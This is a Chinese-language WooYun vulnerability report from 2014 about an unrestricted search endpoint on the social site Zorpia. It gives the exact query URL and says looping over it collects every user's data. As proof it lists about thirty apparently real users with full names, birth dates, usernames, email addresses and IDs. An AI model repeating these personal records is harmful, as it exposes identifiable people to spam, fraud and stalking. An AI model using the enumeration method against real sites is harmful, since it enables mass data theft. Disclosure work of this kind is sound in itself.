当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057386

漏洞标题:Zorpia-若比邻接口限制不严可获取用户所有资料(姓名、生日、帐号、邮箱、地位位置等)

相关厂商:若比邻

漏洞作者: 路人甲

提交时间:2014-04-17 11:47

修复时间:2014-06-01 11:48

公开时间:2014-06-01 11:48

漏洞类型:用户资料大量泄漏

危害等级:低

自评Rank:1

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

没有做最大查询限制

详细说明:

http://zorpia.com/search/zorpians?ajax_search=1&keyword_quote=&start=33&update_criteria=1&pool=0&order=attractive&online=&country=Algeria&state=&city=&gender=female&age_from_search=18&age_to_search=25&_=727
通过该页面可返回json数据,里边包含用户名字用户邮箱 年龄和喜好

漏洞证明:

通过程序顺序循环即可获取所有用户资料

用户姓名      出生日期   账号   邮箱         登陆地
Windy Wang:1981-08-24:reloadback:reloadbackyan@gmail.com:12270298:32
Yustina Sugeng Rahayu Rahayu:1967-12-13:YustinaSugengRah:sekartaji_kdr2000@yahoo.com:31871386:46
Rita Wong:1956-04-06:Rita6141:ritamask88@yahoo.com.hk:29226283:58
sabrina Ballerteros:1965-12-29:sabinaballestero:sabinaballesteros@gmail.com:31455504:48
Rosanie Tomilba:1970-08-19:Rosanie:roset_0819@yahoo.com:31247056:43
Alix Jean:1976-02-14:AlixJean:crizzalin@hotmail.com:31845753:38
brad the_artist:1964-05-05:madbrad:bradpaints@yahoo.com:9085956:49
Fred Espiritu:1962-12-09:fvinca58bseng:fvinca58bseng@yahoo.com:15674829:51
Kathy Leung:1990-11-26:Kathy8951:kathy_leung126@yahoo.com.hk:24928841:23
evelyn pamaos:1980-09-10:evelyn6150:pamaosevelyn@yahoo.com:32020928:33
cora :1975-01-28:coraloaa:coraloaa@yahoo.com.hk:10697056:39
dina taguiam:1964-03-24:dinataguiam:dina_taguiam@yahoo.com:19896604:50
Shu Santy:1987-12-25:ShuSanty1225:shu.santy@yahoo.com:31968525:26
Carol Tang:1966-04-12:CarolTang0412:ctangbeijing@gmail.com:27551577:47
Randy 0512:1956-05-12:RandySu0512:hbgtfieldtester@yahoo.com:30427655:57
Irfan Hussain:1981-06-08:Irfan9505:newsarafashion@yahoo.com:31809592:32
Nin Tang:1974-12-31:milknin:yunintang@gmail.com:3961532:39
Savane Kaira:1968-01-01:SavaneKaira:sy.kaira@yahoo.fr:31920062:46
Yas Lumbang:1980-12-19:YasLumbang:karen_lumbang@yahoo.com:31748997:33
mallam Harun:1966-10-25:harunie:harunbll@yahoo.com:15425207:47
Jolly Chan:1968-02-20:Jolly5687:jolly_chan1@yahoo.com:32250914:46
Olali Jimmy:1962-02-03:OlaliJimmy:olalijimmy@ymail.com:32246337:52
s m:1974-03-12:s9783:smallik.blr@gmail.com:31602359:40
Wendy Pan:1988-08-03:WendyPan:lfdwendy@gmail.com:31934755:25
zorpia cn:1985-08-11:cnzorpia:support@zorpia.cn:6111304:28
Jeffrey Ng:1982-12-14:fokfok:jeffreyn@gmail.com:2:31
Nomadhill Nomadhill:1982-03-31:nomadhill:nomadhill@gmail.com:8951707:32
Alfred Tai:1968-04-21:Alfred5273:alfredtai2001@yahoo.com.hk:32247177:45
Rafale Thunder:1981-11-11:endnesswind:endnesswind@yahoo.com.hk:2409587:32
Mohana Das:1974-04-20:Mohana2777:bapla124@yahoo.co.in:32256569:39

修复方案:

对查询的count 做处理

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论